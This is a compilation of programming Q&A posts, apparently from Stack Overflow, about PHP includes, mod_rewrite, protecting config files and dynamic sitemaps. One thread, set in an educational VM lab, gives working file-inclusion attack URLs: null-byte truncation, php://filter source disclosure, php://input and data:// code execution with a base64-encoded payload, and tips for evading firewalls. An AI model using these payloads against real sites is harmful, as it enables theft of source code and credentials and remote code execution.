Assuming you have only the URL to a file (hosted on the same server as the app) that has been rewritten via mod_rewrite rules.
How would you read the contents of that file with PHP without having direct access to the .htaccess file or the rewrite rules used to build the original URL?
I'm trying to extract all the script tags that have the "src" attribute set, retrieve the contents of each target file, merge them all into one big JavaScript file, minify it and then serve that one instead.
The problem is that reading all of the files via file_get_contents seems to slow the page down. So I was looking for alternatives: could I somehow read the files directly from the file system without generating extra requests in the background? To do that, I would have to find out the path to the files, and some of them are accessed via URLs that have been rewritten.
You can't include it as if it were the original PHP source; you can only get the result of the PHP's execution.
If you've got fopen wrappers enabled, this is as easy as using require, include or file_get_contents on the rewritten URL. Otherwise you have fsockopen and cURL as options to create the HTTP request for the result.
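For example, a minimal sketch (the URL and file names are hypothetical) that fetches the output of a rewritten URL over HTTP, falling back to cURL when allow_url_fopen is disabled:

<?php
// Hypothetical rewritten URL on the same server
$url = 'http://example.com/js/combined.js';

if (ini_get('allow_url_fopen')) {
    // fopen wrappers enabled: a plain file_get_contents works
    $contents = file_get_contents($url);
} else {
    // Otherwise fall back to cURL to make the HTTP request
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $contents = curl_exec($ch);
    curl_close($ch);
}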
As you cannot tell how the request will be handled, the only possible solution is to send an HTTP request to that server. But that would only get you the output of that file/script.
PHP sits behind Apache and has file access at the file-system level using fopen-like, include-like, etc. functions. The rewrite module does not apply to this kind of access, because these functions use the OS's file-access routines, not Apache.
There's no way to do this other than implementing in your PHP script the same URL-rewriting rules you have in .htaccess, because Apache's rewriting and PHP's file access know nothing about each other and sit on completely different layers of the web application.
AFTER EDIT: The only way is to implement your rewrite rules in the PHP script and use PHP's file-system access after parsing the URLs in PHP (not in the rewrite module).
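For instance, if the .htaccess contained a rule like RewriteRule ^js/(.*)$ assets/scripts/$1 (a made-up example, since the actual rules aren't known), the equivalent mapping could be re-implemented in PHP roughly like this:

<?php
// Hypothetical: mirror the rewrite rule  RewriteRule ^js/(.*)$ assets/scripts/$1
function rewritten_url_to_path($url) {
    $path = parse_url($url, PHP_URL_PATH);
    if (preg_match('#^/js/(.+)$#', $path, $m)) {
        return __DIR__ . '/assets/scripts/' . $m[1];
    }
    return null; // no rule matched
}

$file = rewritten_url_to_path('http://example.com/js/app.js');
if ($file !== null && is_file($file)) {
    // Direct file-system read, no extra HTTP request in the background
    $contents = file_get_contents($file);
}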
So I was browsing the web and found a video. Upon inspecting the video source I found out that it had a GET variable in the URL; it looked like this:
http://www.blablabla.com/stream/2017/09/2a5ef169.mp4?expires=1302948611&token=1290239327
This part got my interest:
2a5ef169.mp4?expires=1302948611&token=1290239327
It's an MP4 file, but it accepts GET variables. If those variables don't satisfy a certain check I am not able to view the video, so I think it's linked to a PHP file.
I do know how GET and POST work in PHP, but how do I apply this to an MP4 file or any other file?
Just because the extension ends in mp4, it doesn't mean "there is an mp4 file somewhere".
Consider that .htaccess can change extensions and that, using mod_rewrite or similar, people can redirect a given "clean" URL to any PHP program.
So there may be a php interpreter behind the mp4 requests, and apache may have a modified httpd.conf or .htaccess file which routes /(.*).mp4 requests into a serve_video.php program (or whatever the name is).
This means in general, extensions don't mean anything.
By using HTTP header()s, the server might be responding dynamically to each request (example: https://gist.github.com/ranacseruet/9826293), potentially in order to log the video's view count or something similar, like checking the HTTP referer to prevent hotlinking.
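As a rough illustration only (the rule, the script name serve_video.php and the token scheme are all assumptions, not the actual setup of that site), a rewrite rule such as RewriteRule ^stream/(.+\.mp4)$ serve_video.php?file=$1 [QSA,L] could hand the request to a script along these lines:

<?php
// serve_video.php -- sketch of a dynamic responder for .mp4 URLs
$file    = basename($_GET['file'] ?? '');   // strip any path components
$expires = (int) ($_GET['expires'] ?? 0);
$token   = $_GET['token'] ?? '';

// Hypothetical token scheme: an HMAC of the file name and the expiry time
$expected = hash_hmac('sha256', $file . '|' . $expires, 'server-side-secret');
if ($expires < time() || !hash_equals($expected, $token)) {
    http_response_code(403);
    exit('Link expired or invalid');
}

$path = __DIR__ . '/videos/' . $file;
header('Content-Type: video/mp4');
header('Content-Length: ' . filesize($path));
readfile($path);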
Hope that helps!
Can I use include (or something similar) to get functions (or something else) from an online file?
Something like this:
include 'http://stackoverflow.com/questions/ask.php';
Simple Answer: No
Elaborating:
If you use http or https inside your file path, you are literally telling your code to include a file that is on the internet and to use the HTTP / HTTPS protocol in that process.
As you probably know, PHP code is executed on the server and is never shown to users online; only the output of the PHP is displayed.
For that reason, you won't be able to gain access to the PHP functions defined in that file: from the remote server's point of view your include is just another online user requesting the page, so all you get back is its output.
What you should do is either use relative paths or absolute paths to include php scripts with functions on the same server. Here is some php documentation if you want to read a bit more on how to format the path: PHP DOC
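For example, a minimal sketch (functions.php and say_hello() are hypothetical names) of including a local file so that its functions actually become available:

<?php
// Included from the local file system, so the functions it defines are available here
include __DIR__ . '/includes/functions.php';   // absolute path built from this script's directory
// or, relative to the include_path / current working directory:
// include 'includes/functions.php';

say_hello();   // hypothetical function defined in functions.php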
I would like to keep all config options for a web app in one file (paths, passwords, options which are read by PHP, by Sass during compilation, maybe by Grunt, ...).
I like the JSON format since it's very clear and almost anything can parse JSON. But by default .json files can be downloaded.
Can I safely prevent that by giving the file a .json.php extension?
What are the drawbacks? Better Approaches?
To prevent the file being downloaded, generally the way to go is to store it in a directory that is not served by the web server. I don't know what setup you're in, but assuming an Apache setup, if for example your .php files are served from a directory /home/user/htdocs, you could create a directory /home/user/config, ensure that it is readable by the webserver, and store the .json files there.
Another approach, again assuming Apache, would be to create an .htaccess file containing the following (inspired by this answer):
RedirectMatch 404 \.json$
This would not only prevent downloading any and all .json files in the directory, but hide their very existence.
It might just be possible to do it the way you suggested, by storing the file with a .json.php extension, although this would not be a recommended approach. For this to work, the file has to be valid PHP but it must obviously be valid JSON as well and we are hampered somewhat by the fact that JSON does not allow comments. Something like the following would stop the PHP interpreter soon after the start of the file, before spilling your secrets:
{
"<?php exit('Access denied'); ?>": null,
"password": "secret"
}
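On the server side the application can still read the raw file from disk and parse it as JSON, because the <?php ... ?> marker is just an ordinary string key there. A minimal sketch, assuming the file is named config.json.php:

<?php
// Reads the raw bytes from disk -- this does NOT run the PHP interpreter on the file
$raw    = file_get_contents(__DIR__ . '/config.json.php');
$config = json_decode($raw, true);

if ($config === null) {
    throw new RuntimeException('config.json.php is not valid JSON');
}

echo $config['password'];   // "secret"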
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
This is the code of index.php, for reference:
<?php
include("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page == "") {
    include("home.html");
} else {
    include($page . '.php');
}
include("includes/footer.php");
?>
The main goal is to list the contents of the setupreset PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but allow_url_include is off and cannot be changed, so this won't work (I tried this). However, allow_url_fopen is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.php using this kind of exploit?
If allow_url_include is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, that let you upload your code as an "image", then find the actual path and include it.
And there are still other ways to exploit it.
Let's look at your code. You may notice that it automatically adds the extension .php to the end of the path, so you should leave .php out of the GET parameter. But what if the file you want to include does not have a .php extension? Then use %00 to terminate the string, such as:
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the official manual for detailed information; here I'll show you some cases where a file inclusion vulnerability becomes a source disclosure or even a remote code execution vulnerability.
Before your test, I suggest you use Firefox with HackBar plugin. It's a powerful penetration testing suite.
Source disclosure
This feature doesn't require URL inclusion to be allowed.
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
Then you can see the source of secret.inc.php in the same directory via the following request.
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
The file content will be encoded in base64, so binary files are supported as well.
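To recover the original source, just base64-decode the response body, e.g. (the file name response.txt is only an assumption about where you saved it):

<?php
// $dump holds the base64 string returned by the php://filter request
$dump = file_get_contents('response.txt');
echo base64_decode($dump);   // prints the original secret.inc.php source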
It's a powerful way to get sensitive information, such as database passwords or an encryption key! If privileges are not properly configured, it can even escape its cage and extract data from files in outer directories, like /etc/passwd!
Remote code execution
Actually you can't exploit this way, because allow_url_include is Off in this case.
But I must point it out because it's magical!
It's completely different from a local include. You don't need to upload any file to the remote server. All you need is a single request.
php://input can access the raw HTTP request body, so what does include("php://input") do? Just visit http://localhost/include.php?page=php://input with valid PHP code in the request body, and you can execute any (allowed) function on the remote server!
Don't forget the %00 to drop the .php tail.
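As an illustration only (it won't work against this sample site since, as noted, allow_url_include is off there), such a request could be sent with PHP's own stream functions:

<?php
// Sketch: POST a PHP payload as the raw request body to include.php?page=php://input
$payload = '<?php phpinfo(); ?>';
$context = stream_context_create([
    'http' => [
        'method'  => 'POST',
        'header'  => 'Content-Type: text/plain',
        'content' => $payload,
    ],
]);
echo file_get_contents('http://localhost/include.php?page=php://input', false, $context);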
Besides, PHP supports the data:// URL scheme, so you can put code directly in the GET parameter! The following test doesn't need any special tool; a normal browser can carry out the attack.
http://localhost/include.php?page=data:text/plain,<?php phpinfo();?>
Some web application firewalls may detect a suspicious string in the URL and block the evil request; they won't leave the phpinfo alone. Is there a way to encode it? Of course: data:// URLs support at least base64 encoding...
http://localhost/include.php?page=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will see the familiar phpinfo output once again!
Note
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on Wikipedia).
http://example.com/index.php?page=setupreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
It is not. The PHP file is getting executed because you call include; if you called readfile, file_get_contents or similar instead, you could see the contents of the PHP file.
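In other words, if index.php had used a file-reading function instead of include, the raw source would have been sent back. A minimal sketch of the difference:

<?php
// include() runs the file as PHP code -- only its output is visible
include 'setupreset.php';

// readfile() and file_get_contents() return the raw bytes, i.e. the PHP source itself
readfile('setupreset.php');
echo file_get_contents('setupreset.php');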
Here's the problem I'm trying to solve: I have a dynamic php-driven website that is constantly being updated with new content, and I want my XML sitemap to stay up to date automatically. Two options I see:
Write a PHP script that queries my database to get all my content and writes the output to http://mysite.com/sitemap.xml, then execute the script regularly using a cron job.
Simply create my sitemap as a PHP file (sitemap.php) that queries the db and outputs the sitemap directly, and use the .htaccess rewrite rule RewriteRule ^sitemap.xml$ sitemap.php so that whenever someone requests sitemap.xml they're directed to the PHP file and get a fresh sitemap.
I'd much rather go with option #2 since it's simpler and doesn't require setting up a cron, but I'm wondering if Googlebot will not recognize sitemap.xml as valid if it's actually a php file?
Does anyone know if option #2 would work, and if not whether there's some better way to automatically create an up-to-date sitemap.xml file? I'm really surprised how much trouble I've had with this... Thanks!
Just make sure your script generates the appropriate Content-Type header. You can do so with header().
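A minimal sketch of such a sitemap.php (the table and column names are made up and would have to match your own schema):

<?php
// sitemap.php -- served as sitemap.xml via the rewrite rule from the question
header('Content-Type: application/xml; charset=utf-8');

// Hypothetical query: adapt the DSN, credentials and SQL to your own database
$pdo   = new PDO('mysql:host=localhost;dbname=mysite', 'user', 'password');
$pages = $pdo->query('SELECT slug, updated_at FROM pages')->fetchAll(PDO::FETCH_ASSOC);

echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
echo '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($pages as $page) {
    echo "  <url>\n";
    echo '    <loc>http://mysite.com/' . htmlspecialchars($page['slug']) . "</loc>\n";
    echo '    <lastmod>' . date('Y-m-d', strtotime($page['updated_at'])) . "</lastmod>\n";
    echo "  </url>\n";
}
echo '</urlset>';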
Google will only get the headers and the body of the response. If your php script returns the same headers and the same body as your webserver would return, then there is technically no difference between the PHP script response or the XML file response by your server. Use curl -i http://example.com/ to inspect the response headers of a request if you would like to test that on your own.
So you can safely do this; that's what mod_rewrite was designed for (among many other things).